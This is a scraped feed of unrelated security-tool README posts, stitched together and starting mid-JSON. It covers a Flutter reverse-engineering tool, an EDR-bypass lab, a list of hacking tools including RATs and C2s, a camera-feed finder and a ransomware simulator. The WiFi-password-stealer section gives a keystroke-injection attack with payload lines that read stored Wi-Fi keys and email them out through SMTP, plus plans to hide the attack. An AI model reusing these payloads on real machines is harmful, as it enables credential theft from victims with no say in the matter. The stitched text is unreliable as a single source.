"EC2.22 Unused EC2 security groups should be removed": {
"SeverityLabel": "MEDIUM",
"Workflow": {
"Status": "NEW"
},
"RecordState": "ACTIVE",
"Compliance": {
"Status": "FAILED"
},
"Id": "arn:aws:security hub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.22/finding/01234567890-1234-1234-1234-01234567890",
"ProductArn": "arn:aws:security hub:eu-west-1::product/aws/security hub"
}
}
],
"AwsAccountId": "01234567890",
"AwsAccountAlias": "obfuscated",
"Region": "eu-west-1",
"ResourceType": "AwsEc2SecurityGroup"
}
Your findings are combined under the ARN of the resource affected, ending in only one result or one non-compliant resource.
You can now work in MetaHub with all these four findings together as if they were only one. For example, you can update the workflow status of these four findings using only one command: see Updating Workflow Status.
Contributing
You can follow this guide if you want to contribute to the Context module.
Blutter - Flutter Mobile Application Reverse Engineering Tool
Flutter Mobile Application Reverse Engineering Tool by Compiling Dart AOT Runtime
Currently, the application supports only Android libapp.so (arm64 only) and works only against recent Dart versions.
For high priority missing features, see TODO
Environment Setup
This application uses the C++20 formatting library. It requires a very recent C++ compiler such as g++ >= 13 or Clang >= 15.
I recommend using a Linux OS (only tested on Debian sid/trixie) because it is easy to set up.
Debian Unstable (gcc 13)
- Install build tools and dependencies
apt install python3-pyelftools python3-requests git cmake ninja-build \
build-essential pkg-config libicu-dev libcapstone-dev
Windows
- Install git and python 3
- Install latest Visual Studio with "Desktop development with C++" and "C++ CMake tools"
- Install required libraries (libcapstone and libicu4c)
python scripts\init_env_win.py
- Start "x64 Native Tools Command Prompt"
macOS Ventura (clang 15)
- Install XCode
- Install clang 15 and required tools
brew install llvm@15 cmake ninja pkg-config icu4c capstone
pip3 install pyelftools requests
Usage
Extract "lib" directory from apk file
python3 blutter.py path/to/app/lib/arm64-v8a out_dir
blutter.py will automatically detect the Dart version from the Flutter engine and call the appropriate blutter executable to extract the information from libapp.so.
If the blutter executable for the required Dart version does not exist, the script will automatically check out the Dart source code and compile it.
Update
You can use git pull to update, then run blutter.py with the --rebuild option to force a rebuild of the executable:
python3 blutter.py path/to/app/lib/arm64-v8a out_dir --rebuild
Output files
- asm/* libapp assemblies with symbols
- blutter_frida.js the frida script template for the target application (see the example invocation after this list)
- objs.txt complete (nested) dump of Object from Object Pool
- pp.txt all Dart objects in Object Pool
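For reference, a script template like blutter_frida.js is typically loaded with a standard Frida invocation; the package name below is a hypothetical placeholder for your target app:
frida -U -f com.example.app -l blutter_frida.js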
Directories
- bin contains blutter executables for each Dart version in "blutter_dartvm<ver>_<os>_<arch>" format
- blutter contains the source code, which needs to be built against the Dart VM library
- build contains build projects, which can be deleted after the build process is finished
- dartsdk contains a checkout of the Dart runtime, which can be deleted after the build process is finished
- external contains 3rd party libraries for Windows only
- packages contains the static libraries of Dart Runtime
- scripts contains python scripts for getting/building Dart
Generating Visual Studio Solution for Development
I use Visual Studio to develop Blutter on Windows. The --vs-sln option can be used to generate a Visual Studio solution.
python blutter.py path\to\lib\arm64-v8a build\vs --vs-sln
TODO
- More code analysis
- Function arguments and return type
- Some pseudo code for code patterns
- Generate better Frida script
- More internal classes
- Object modification
- Obfuscated app (still missing many functions)
- Reading iOS binary
- Input as apk or ipa
- BestEdrOfTheMarket - Little AV/EDR Bypassing Lab For Training And Learning Purposes
BestEdrOfTheMarket - Little AV/EDR Bypassing Lab For Training And Learning Purposes
Little AV/EDR Evasion Lab for training & learning purposes. (under construction...)
____ _ _____ ____ ____ ___ __ _____ _
| __ ) ___ ___| |_ | ____| _ \| _ \ / _ \ / _| |_ _| |__ ___
| _ \ / _ \/ __| __| | _| | | | | |_) | | | | | |_ | | | '_ \ / _ \
| |_) | __/\__ \ |_ | |___| |_| | _ < | |_| | _| | | | | | | __/
|____/_\___||___/\__| |_____|____/|_| \_\ \___/|_| |_| |_| |_|\___|
| \/ | __ _ _ __| | _____| |_
| |\/| |/ _` | '__| |/ / _ \ __|
| | | | (_| | | | < __/ |_ Yazidou - github.com/Xacone
|_| |_|\__,_|_| |_|\_\___|\__|
BestEDROfTheMarket is a naive user-mode EDR (Endpoint Detection and Response) project, designed to serve as a testing ground for understanding and bypassing the user-mode detection methods frequently used by EDR security solutions.
These techniques are mainly based on dynamic analysis of the target process state (memory, API calls, etc.).
Feel free to check out this short article I wrote that describes the interception and analysis methods implemented by the EDR.
Defensive Techniques
- Multi-Levels API Hooking
- SSN Hooking/Crushing
- IAT Hooking
- Shellcode Injection Detection
- Reflective Module Loading Detection
- Call Stack Monitoring
In progress:
Usage
Usage: BestEdrOfTheMarket.exe [args]
/help Shows this help message and quit
/v Verbosity
/iat IAT hooking
/stack Threads call stack monitoring
/nt Inline Nt-level hooking
/k32 Inline Kernel32/Kernelbase hooking
/ssn SSN crushing
BestEdrOfTheMarket.exe /stack /v /k32
BestEdrOfTheMarket.exe /stack /nt
BestEdrOfTheMarket.exe /iat
Top 20 Most Popular Hacking Tools in 2023
- PhoneSploit-Pro - An All-In-One Hacking Tool To Remotely Exploit Android Devices Using ADB And Metasploit-Framework To Get A Meterpreter Session
- Gmailc2 - A Fully Undetectable C2 Server That Communicates Via Google SMTP To Evade Antivirus Protections And Network Traffic Restrictions
- Faraday - Open Source Vulnerability Management Platform
- CloakQuest3r - Uncover The True IP Address Of Websites Safeguarded By Cloudflare
- Killer - Is A Tool Created To Evade AVs And EDRs Or Security Tools
- Geowifi - Search WiFi Geolocation Data By BSSID And SSID On Different Public Databases
- Waf-Bypass - Check Your WAF Before An Attacker Does
- PentestGPT - A GPT-empowered Penetration Testing Tool
- Sirius - First Truly Open-Source General Purpose Vulnerability Scanner
- LSMS - Linux Security And Monitoring Scripts
- GodPotato - Local Privilege Escalation Tool From A Windows Service Accounts To NT AUTHORITY\SYSTEM
- Bypass-403 - A Simple Script Just Made For Self Use For Bypassing 403
- ThunderCloud - Cloud Exploit Framework
- GPT_Vuln-analyzer - Uses ChatGPT API And Python-Nmap Module To Use The GPT3 Model To Create Vulnerability Reports Based On Nmap Scan Data
- Kscan - Simple Asset Mapping Tool
- RedTeam-Physical-Tools - Red Team Toolkit - A Curated List Of Tools That Are Commonly Used In The Field For Physical Security, Red Teaming, And Tactical Covert Entry
- DNSWatch - DNS Traffic Sniffer and Analyzer
- IpGeo - Tool To Extract IP Addresses From Captured Network Traffic File
- TelegramRAT - Cross Platform Telegram Based RAT That Communicates Via Telegram To Evade Network Restrictions
- XSS-Exploitation-Tool - An XSS Exploitation Tool
The KitPloit team wishes you a Happy New Year!
Pantheon - Insecure Camera Parser
Pantheon is a GUI application that allows users to display information regarding network cameras in various countries as well as an integrated live-feed for non-protected cameras.
Functionalities
Pantheon allows users to execute an API crawler. There was originally functionality without the use of any APIs (like Insecam), but Google's TOS kept getting in the way of the original scraping mechanism.
Installation
git clone https://github.com/josh0xA/Pantheon.git
cd Pantheon
pip3 install -r requirements.txt
Execution: python3 pantheon.py
- Note: I will later add a GUI installer to make it fully independent of a CLI
Windows
- You can just follow the steps above or download the official package here.
- Note, the PE binary of Pantheon was put together using pyinstaller, so Windows Defender might get a bit upset.
Ubuntu
- First, complete steps 1, 2 and 3 listed above.
chmod +x distros/ubuntu_install.sh
./distros/ubuntu_install.sh
Debian and Kali Linux
- First, complete steps 1, 2 and 3 listed above.
chmod +x distros/debian-kali_install.sh
./distros/debian-kali_install.sh
MacOS
- The regular installation steps above should suffice. If not, open up an issue.
Usage
(Enter) on a selected IP:Port to establish a Pantheon webview of the camera. (Use this at your own risk)
(Left-click) on a selected IP:Port to view the geolocation of the camera.
(Right-click) on a selected IP:Port to view the HTTP data of the camera (Ctrl+Left-click for Mac).
Adjust the map as you please to see the markers.
- Also note that this app is far from perfect and not every link that shows up is a live-feed; some are login pages (Do NOT attempt to log in).
Ethical Notice
The developer of this program, Josh Schiavone, is not responsible for misuse of this data gathering tool. Pantheon simply provides information that can be indexed by any modern search engine. Do not try to establish unauthorized access to live feeds that are password protected - that is illegal. Furthermore, if you do choose to use Pantheon to view a live-feed, do so at your own risk. Pantheon was developed for educational purposes only. For further information, please visit: https://joshschiavone.com/panth_info/panth_ethical_notice.html
Licence
MIT License
Copyright (c) Josh Schiavone
- WiFi-password-stealer - Simple Windows And Linux Keystroke Injection Tool That Exfiltrates Stored WiFi Data (SSID And Password)
WiFi-password-stealer - Simple Windows And Linux Keystroke Injection Tool That Exfiltrates Stored WiFi Data (SSID And Password)
Have you ever watched a film where a hacker plugs a seemingly ordinary USB drive into a victim's computer and steals data from it? - A proper wet dream for some.
Disclaimer: All content in this project is intended for security research purpose only.
Introduction
During the summer of 2022, I decided to do exactly that, to build a device that will allow me to steal data from a victim's computer. So, how does one deploy malware and exfiltrate data? In the following text I will explain all of the necessary steps, theory and nuances when it comes to building your own keystroke injection tool. While this project/tutorial focuses on WiFi passwords, payload code could easily be altered to do something more nefarious. You are only limited by your imagination (and your technical skills).
Setup
After creating pico-ducky, you only need to copy the modified payload (adjusted for your SMTP details for Windows exploit and/or adjusted for the Linux password and a USB drive name) to the RPi Pico.
Prerequisites
Physical access to victim's computer.
Unlocked victim's computer.
Victim's computer has to have internet access in order to send the stolen data using SMTP for the exfiltration over a network medium.
Knowledge of victim's computer password for the Linux exploit.
Requirements - What you'll need
- Raspberry Pi Pico (RPi Pico)
- Micro USB to USB Cable
- Jumper Wire (optional)
- pico-ducky - Transformed RPi Pico into a USB Rubber Ducky
- USB flash drive (for the exploit over physical medium only)
Note:
It is possible to build this tool using Rubber Ducky, but keep in mind that RPi Pico costs about $4.00 and the Rubber Ducky costs $80.00.
However, while pico-ducky is a good and budget-friendly solution, Rubber Ducky does offer things like stealthiness and usage of the latest DuckyScript version.
In order to use Ducky Script to write the payload on your RPi Pico you first need to convert it to a pico-ducky. Follow these simple steps in order to create pico-ducky.
Keystroke injection tool
Keystroke injection tool, once connected to a host machine, executes malicious commands by running code that mimics keystrokes entered by a user. While it looks like a USB drive, it acts like a keyboard that types in a preprogrammed payload. Tools like Rubber Ducky can type over 1,000 words per minute. Once created, anyone with physical access can deploy this payload with ease.
Keystroke injection
The payload uses the STRING command to process keystrokes for injection. It accepts one or more alphanumeric/punctuation characters and types the remainder of the line exactly as-is into the target machine. ENTER/SPACE simulate presses of those keyboard keys.
Delays
We use the DELAY command to temporarily pause execution of the payload. This is useful when a payload needs to wait for an element such as a command line to load. A delay is especially useful at the very beginning, when a new USB device is connected to a targeted computer: the computer must complete a set of actions before it can begin accepting input commands. In the case of HIDs, setup time is very short; in most cases it takes a fraction of a second, because the drivers are built-in. However, in some instances a slower PC may take longer to recognize the pico-ducky. The general advice is to adjust the delay time according to your target.
Exfiltration
Data exfiltration is an unauthorized transfer of data from a computer/device. Once the data is collected, the adversary can package it to avoid detection while sending it over the network, using encryption or compression. The two most common ways of exfiltration are:
- Exfiltration over the network medium.
This approach was used for the Windows exploit. The whole payload can be seen here.
- Exfiltration over a physical medium.
This approach was used for the Linux exploit. The whole payload can be seen here.
Windows exploit
In order to use the Windows payload (payload1.dd), you don't need to connect any jumper wire between pins.
Sending stolen data over email
Once passwords have been exported to the .txt file, the payload will send the data to the appointed email using Yahoo SMTP. For more detailed instructions, visit the following link. Also, the payload template needs to be updated with your SMTP information, meaning that you need to update RECEIVER_EMAIL, SENDER_EMAIL and your email PASSWORD. In addition, you could also update the body and the subject of the email.
STRING Send-MailMessage -To 'RECEIVER_EMAIL' -from 'SENDER_EMAIL' -Subject "Stolen data from PC" -Body "Exploited data is stored in the attachment." -Attachments .\wifi_pass.txt -SmtpServer 'smtp.mail.yahoo.com' -Credential $(New-Object System.Management.Automation.PSCredential -ArgumentList 'SENDER_EMAIL', $('PASSWORD' | ConvertTo-SecureString -AsPlainText -Force)) -UseSsl -Port 587
Note:
After sending the data over email, the .txt file is deleted. You can also use an SMTP server from another email provider, but be mindful of the SMTP server and port number you write in the payload.
Keep in mind that some networks may block the use of an unknown SMTP server at the firewall.
Linux exploit
In order to use the Linux payload (payload2.dd) you need to connect a jumper wire between GND and GPIO5 in order to comply with the code in code.py on your RPi Pico. For more information about how to set up multiple payloads on your RPi Pico, visit this link.
Storing stolen data to USB flash drive
Once passwords have been exported from the computer, the data will be saved to the appointed USB flash drive. In order for this payload to function properly, it needs to be updated with the correct name of your USB drive, meaning you will need to replace USBSTICK with the name of your USB drive in two places.
STRING echo -e "Wireless_Network_Name Password\n--------------------- --------" > /media/$(hostname)/USBSTICK/wifi_pass.txt |
STRING done >> /media/$(hostname)/USBSTICK/wifi_pass.txt |
In addition, you will also need to update the Linux PASSWORD in the payload in three places. As stated above, in order for this exploit to be successful, you will need to know the victim's Linux machine password, which makes this attack less plausible.
STRING echo PASSWORD | sudo -S echo
STRING do echo -e "$(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=ssid=).*') \t\t\t\t $(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=psk=).*')"
Bash script
In order to run the wifi_passwords_print.sh script, you will need to update the script with the correct name of your USB stick, after which you can type the following command in your terminal:
echo PASSWORD | sudo -S sh wifi_passwords_print.sh USBSTICK
where PASSWORD is your account's password and USBSTICK is the name of your USB device.
Quick overview of the payload
NetworkManager is based on the concept of connection profiles, and it uses plugins for reading/writing data. It uses an .ini-style keyfile format to store network configuration profiles. The keyfile is a plugin that supports all the connection types and capabilities that NetworkManager has. The files are located in /etc/NetworkManager/system-connections/. Based on the keyfile format, the payload uses the grep command with a regex in order to extract the data of interest. For file filtering, a positive lookbehind assertion was used ((?<=keyword)). The positive lookbehind assertion matches at a position right after the keyword without making the keyword itself part of the match, so the regex (?<=keyword).* will match any text after the keyword. This allows the payload to match the values after the ssid and psk (pre-shared key) keywords.
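As a quick test of the same pattern (the keyfile content below is made up for illustration, mirroring the keyfile format), the lookbehind behaves identically in Python's re module:
import re

# hypothetical keyfile content for illustration only
keyfile = """[wifi]
ssid=WLAN1
[wifi-security]
psk=pass1
"""

print(re.search(r"(?<=ssid=).*", keyfile).group())  # WLAN1
print(re.search(r"(?<=psk=).*", keyfile).group())   # pass1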
For more information about NetworkManager, here are some useful links:
Exfiltrated data formatting
Below is an example of the exfiltrated and formatted data from a victim's machine in a .txt file (WiFi-password-stealer/resources/wifi_pass.txt, lines 1 to 5 in f5b3b11):
Wireless_Network_Name    Password
---------------------    --------
WLAN1                    pass1
WLAN2                    pass2
WLAN3                    pass3
USB Mass Storage Device Problem
One of the advantages of Rubber Ducky over RPi Pico is that it doesn't show up as a USB mass storage device once plugged in. Once plugged into the computer, all the machine sees is a USB keyboard. This isn't the default behavior for the RPi Pico. If you want to prevent your RPi Pico from showing up as a USB mass storage device when plugged in, you need to connect a jumper wire between pin 18 (GND) and pin 20 (GPIO15). For more details visit this link.
Tip:
- Upload your payload to RPi Pico before you connect the pins.
- Don't solder the pins because you will probably want to change/update the payload at some point.
Payload Writer
When creating a functioning payload file, you can use the writer.py script, or you can manually change the template file. In order to run the script successfully, you will need to pass, in addition to the script file name, the name of the OS (windows or linux) and the name of the payload file (e.g. payload1.dd). Below you can find an example of how to run the writer script when creating a Windows payload.
python3 writer.py windows payload1.dd
Limitations/Drawbacks
This pico-ducky currently works only on Windows OS. This attack requires physical access to an unlocked device in order to be successfully deployed.
The Linux exploit is far less likely to be successful, because in order to succeed, you not only need physical access to an unlocked device, you also need to know the admin's password for the Linux machine.
Machine's firewall or network's firewall may prevent stolen data from being sent over the network medium.
Payload delays could be inadequate due to varying speeds of different computers used to deploy an attack.
The pico-ducky device isn't really stealthy; actually, it's quite the opposite: it's really bulky, especially if you solder the pins.
Also, the pico-ducky device is noticeably slower compared to the Rubber Ducky running the same script.
If Caps Lock is ON, some of the payload code will not be executed and the exploit will fail. If the computer has a non-English environment set, this exploit won't be successful.
Currently, pico-ducky doesn't support DuckyScript 3.0; only DuckyScript 1.0 can be used. If you need the 3.0 version, you will have to use the Rubber Ducky.
To-Do List
- Fix Caps Lock bug.
- Fix non-English environment bug.
- Obfuscate the command prompt.
- Implement exfiltration over a physical medium.
- Create a payload for Linux.
- Encode/Encrypt exfiltrated data before sending it over email.
- Implement indicator of successfully completed exploit.
- Implement command history clean-up for Linux exploit.
- Enhance the Linux exploit in order to avoid usage of sudo.
RansomwareSim - A Simulated Ransomware
Overview
RansomwareSim is a simulated ransomware application developed for educational and training purposes. It is designed to demonstrate how ransomware encrypts files on a system and communicates with a command-and-control server. This tool is strictly for educational use and should not be used for malicious purposes.
Features
- Encrypts specified file types within a target directory.
- Changes the desktop wallpaper (Windows only).
- Creates and deletes a README file on the desktop with a simulated ransom note.
- Simulates communication with a command-and-control server to send system data and receive a decryption key.
- Decrypts files after receiving the correct key.
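The project's own encryption code isn't reproduced here, but given the cryptography dependency listed under Requirements, a minimal sketch of such an encrypt/decrypt cycle (the path is a placeholder; this is not RansomwareSim's actual code) could look like this:
from pathlib import Path
from cryptography.fernet import Fernet

# illustration only - not RansomwareSim's code; the path is a placeholder
key = Fernet.generate_key()   # in the simulation, the C2 server would hold this key
fernet = Fernet(key)

target = Path("testdir/example.txt")
target.write_bytes(fernet.encrypt(target.read_bytes()))  # encrypt in place

# later, once the correct key is received back from the server:
target.write_bytes(fernet.decrypt(target.read_bytes()))  # restore the file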
Usage
Important: This tool should only be used in controlled environments where all participants have given consent. Do not use this tool on any system without explicit permission. For more, read SECURE
Requirements
- Python 3.x
- cryptography
- colorama
Installation
- Clone the repository:
git clone https://github.com/HalilDeniz/RansomwareSim.git
- Navigate to the project directory:
cd RansomwareSim
- Install the required dependencies:
pip install -r requirements.txt
My Book
- Mastering Scapy: A Comprehensive Guide to Network Analysis
- Python Learning Roadmap in 30 Days: here
- Beginning Your Journey in Programming and Cybersecurity - Navigating the Digital Future
Running the Control Server
- Open controlpanel.py.
- Start the server by running controlpanel.py.
- The server will listen for connections from RansomwareSim and the Decoder.
Running the Simulator
- Navigate to the directory containing RansomwareSim.
- Modify the main function in encoder.py to specify the target directory and other parameters.
- Run encoder.py to start the encryption process.
- Follow the instructions displayed on the console.
Running the Decoder
- Run decoder.py after the files have been encrypted.
- Follow the prompts to input the decryption key.
Disclaimer
RansomwareSim is developed for educational purposes only. The creators of RansomwareSim are not responsible for any misuse of this tool. This tool should not be used in any unauthorized or illegal manner. Always ensure ethical and legal use of this tool.
Contributing
Contributions, suggestions, and feedback are welcome. Please create an issue or pull request for any contributions.
- Fork the repository.
- Create a new branch for your feature or bug fix.
- Make your changes and commit them.
- Push your changes to your forked repository.
- Open a pull request in the main repository.
Contact
For any inquiries or further information, you can reach me through the following channels:
- LinkedIn : Halil Ibrahim Deniz
- TryHackMe: Halilovic
- Instagram: deniz.halil333
- YouTube : Halil Deniz
- Email : [email protected]